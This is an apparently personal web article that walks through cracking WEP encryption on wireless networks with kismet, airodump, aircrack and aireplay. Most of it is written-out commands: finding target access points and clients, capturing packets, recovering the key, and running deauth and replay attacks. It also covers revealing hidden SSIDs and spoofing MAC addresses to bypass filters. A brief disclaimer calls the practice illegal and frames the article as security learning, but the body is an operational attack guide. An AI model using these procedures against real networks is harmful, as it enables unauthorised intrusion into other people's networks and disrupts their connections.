WLAN hacking
Site Navigation:

WLAN hacking

Author:  Sven Knispel
Updated:  [udate]

Hacking other people's WLAN is illegal and unethical. This article is not about penetrating foreing WLANs but about learning someting about security. The techniques described here apply the encryption with WEP, not WPA.

I have successfully installed the tools on Fedora Core 3 (FC3) and Fedora Core 4 (FC4).

It is amazing how many believe that hiding their SSID or rejecting foreign MAC addresses is secure enough. The reality is somehow different: even a WEP-Encryption with 128 bits key is not secure.
I recommend anyone having a WLAN to try the techniques from this article and find out how easy it is for someone with bad intentions to penetrate a wireless lan.
This article focuses on installing and using the available tools to detect a wireless network, gather the required details and crack its WEP encryption:

  • Installing and using kismet, aireplay, airodump and aircrack
  • Collecting encrypted packets
  • Cracking the WEP key from collected data
  • Common techniques and attacks on WLANs

For those who don't want to configure their Linux to do this there is pre-configured Live CDs worth looking at:

1. References

There are many source about this matter. I especially recommend these:

2. Setup

Note these steps are not required if you use a Live CD.

2.1 Kismet

Download Kismet for fc4 from http://rpmforge.net/user/packages/kismet/ and install:
rpm -ivh kismet-3.0.1-3.200508r1.2.fc4.rf.i386.rpm Edit /etc/kismet.conf (also see http://www.kismetwireless.net/documentation.shtml):

  • Set the user id
  • Set the source (check 12 in the documentation to configure the source, mine looks like "madwifi_g, ath0, some-name")

2.2. Aircrack

Download and install the aircrack tools suite, e.g. from http://rpm.pbone.net/index.php3/stat/4/idpl/2210150/com/aircrack-2.23-1.1.fc3.rf.i386.rpm.html.

3. Cracking WEP

3.1. Collect data with kismet

3.1.1. Gather access point data

Highlight the access point and press "enter".
From the details screen collect the access point MAC address and the channel.
Go back the the main screen with "q".

3.1.2. Display associated client data

Highlight the access point and press "Shift-C".
Look for clients of type "E" (established).

3.2. Capture packets with airodump

To capture data the NIC must be set to Montor mode on the channel detected earlier: iwconfig ath0 mode Monitor channel <channel> and then start the capture: airodump <interface> <capture-file> <channel> Wait till WEP ecrypted data is collected. It is important to look for WEP-ecrypted data sent to/from the SSID.
For 64 bits WEP key between about 50000 and 20000 packets are required, for 128 bits between 200000 and 700000.

3.3. Crack WEP keys with aircrack

Using the captured encrypted data we will now use aircrack to crack the key.
Start aircrack on the cap-file: aircrack -e <ssid> -f 2 -m <mac address of AP> -n <key-len> [-q] <filename>

4. Hints and tips

4.1. Drivers with packet injection

A certain number of attacks can be run on a WLAN to gather information or to speed up data-collection.
If you don't use a Live CD it is required to have a WLAN driver that supports packet injection for these.

The process of recompiling different drivers is described here.

For MADWIFI I was able to recompile the drivers for version 20050707: ifconfig ath0 down
rmmod wlan_wep ath_rate_onoe ath_pci wlan ath_hal

find /lib/modules -name 'ath*' -exec rm -v {} \;
find /lib/modules -name 'wlan*' -exec rm -v {} \;
cd /usr/src
wget http://100h.org/wlan/linux/atheros/madwifi-cvs-20050707.tgz
wget http://100h.org/wlan/linux/patches/madwifi-cvs-20050707.patch
tar -xvzf madwifi-cvs-20050814.tgz
cd madwifi-cvs-20050707
patch -Np1 -i ../madwifi-cvs-20050707.patch
make && make install
modprobe ath_pci
On FC4 I have had some trouble with make due to a missing uudecode. This was solved by installing the sharutils package.

4.2. DeAuth attack

The speed of data collection can be increased by a so called deauth-attack: the clients are kicked off the access point and reconnecting. If the reconnection was traced it could be replayed in order to increase the data collection.
aireplay/code> provides the functionality for these attacks: aireplay -0 2 <AP MAC> to broadcast the DeAuth forces a reauthentication of a client
aireplay -3 -x 600 -b &lp;ap MAC> -h <client MAC> ath0 replays the authentication packets
airdump ath0 <file> <channel> captures the data

We would use following steps:

  • start aireplay -3 ..... to capture: it says "got 0 ARP requests"
  • start aireplay -0 .... to De-Auth a client: after a while the number of ARP packet increases
  • start airdump to collect the data (for WEP128 about 500k packets seems right)

4.3. Hidden SSIDs

Some access points are configured not to broadcast their SSIDs. The access point is still shown in kismet but the SSID is not displayed. The SSID can be recovered using aireplay:
aireplay -0 2 -a <a/p MAC> ath0

4.4. Spoofing MAC address

Some access points have a filter of allowed MAC addresses. The WEP key is not enough in order to connect to the wireless LAN in that case, but the filtering should not be used in the belief that MAC-addresses can not be spoofed.
If supported by the driver (it is for Madwifi that I am using) this simple command will replace the MAC address: ifconfig <interface> hw ether <MAC-address>